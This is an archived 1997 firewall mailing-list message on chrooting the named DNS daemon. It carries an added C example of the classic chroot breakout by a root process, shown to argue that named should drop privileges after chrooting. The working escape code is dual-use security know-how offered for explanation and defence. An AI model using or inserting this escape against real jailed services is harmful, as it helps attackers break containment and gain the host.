Firewall Wizards mailing list archives
Re: DNS on the Firewall - security problem
From: Adam Shostack <adam () homeport org>
Date: Fri, 10 Oct 1997 07:51:09 -0400 (EDT)
Marc Heuse wrote:
| I found so far two possibilities to solve this problem ...
| The first is to chroot named. pointer : www.homeport.org/~adam/dns.html
| The second is to just forward the dns resolving to a host in the dmz plus
| running also the primary external dns there.
|
| Do you see any problems with these suggestions?
| And another question, are there any secure/minimal dns-servers out there?
| pointers?

Since I wrote the chrooting a named doc, I'll remind everyone that a root process chrooted is not all that great an improvement in the theoretical analysis. It's a nice improvement in practicality, since there is no egg* to overflow and break a chroot. Thus, if you don't put CHROOT/bin/sh in place, the standard attacks will fail, but a smart attacker can still get in. In practicality, there are few smart attackers.

Adam

*An egg is the core of code that a buffer overflow includes to do the real work. It's the thing that hatches and gets you root. See some early l0pht advisory. And make that "no egg generally available."

--
"It is seldom that liberty of any kind is lost all at once." -Hume
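The breakout Adam is alluding to, written out as an added C example (it is not code from the original post, nor from the named-chroot document the post points to). It assumes only POSIX chroot(2)/chdir(2)/mkdtemp(3) and a writable scratch directory visible from inside the jail; the function name escape_chroot, the 64-step climb and the /tmp scratch path are this example's own choices. The point it shows is the one made in the message: nothing in the jail needs to be executable, because every step is a bare system call an overflow egg can carry itself, and the only precondition is that the process is still root.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Classic chroot(2) breakout, usable only by a process that still has root
 * (CAP_SYS_CHROOT on Linux).  It needs no /bin/sh inside the jail: every
 * step is a direct system call, which is exactly what an overflow "egg"
 * would contain.
 *
 * scratch: a writable directory, as seen from the current root, in which a
 *          throw-away sub-jail can be created (assumed to exist).
 * Returns 0 once the process's root has been reset to the real filesystem
 * root, -1 on failure with errno set (EPERM when the caller is not root).
 */
int escape_chroot(const char *scratch)
{
    char jail[4096];
    int saved;

    if (snprintf(jail, sizeof jail, "%s/escape.XXXXXX", scratch) >= (int)sizeof jail) {
        errno = ENAMETOOLONG;
        return -1;
    }
    if (mkdtemp(jail) == NULL)
        return -1;

    /* 1. Move the root directory into the new sub-jail, but deliberately do
     *    NOT chdir() into it: the working directory stays outside the new
     *    root.  This is the call that fails with EPERM once privileges have
     *    been dropped. */
    if (chroot(jail) == -1) {
        saved = errno;          /* EPERM for an unprivileged process */
        rmdir(jail);
        errno = saved;
        return -1;
    }

    /* 2. Because cwd is outside the root, ".." is never clamped at the jail
     *    boundary; walking up far enough reaches the real "/".  chdir("..")
     *    at the real root simply stays there, so over-counting is harmless. */
    for (int i = 0; i < 64; i++) {
        if (chdir("..") == -1)
            return -1;
    }

    /* 3. Make the directory we climbed to (the real root) our root again. */
    if (chroot(".") == -1)
        return -1;

    rmdir(jail);                /* best-effort cleanup of the sub-jail */
    return 0;
}

int main(void)
{
    if (escape_chroot("/tmp") == 0) {
        printf("root reset to the real filesystem root (process was root)\n");
        return 0;
    }
    printf("escape failed: %s\n", strerror(errno));
    return 1;
}
```

Run as an ordinary user it stops at step 1 with EPERM; run as root it ends with the real root as its root directory. That asymmetry is the practical check to take from the message: a named that chroots and then stays root is protected only by the absence of an egg, whereas a named that chroots and then drops to an unprivileged uid and gid cannot make the chroot(2) call at all, so the jail holds even against the smart attacker.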
Current thread:
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 10)
- Re: DNS on the Firewall - security problem Alfred Huger (Oct 10)
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 12)
- Re: DNS on the Firewall - security problem Darren Reed (Oct 12)
- Re: DNS on the Firewall - security problem Perry E. Metzger (Oct 12)
- Re: DNS on the Firewall - security problem Aleph One (Oct 12)
- Re: DNS on the Firewall - security problem Gaddy Gumbao (Oct 13)
- Re: DNS on the Firewall - security problem Bernd Eckenfels (Oct 19)
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 12)
- Re: DNS on the Firewall - security problem Alfred Huger (Oct 10)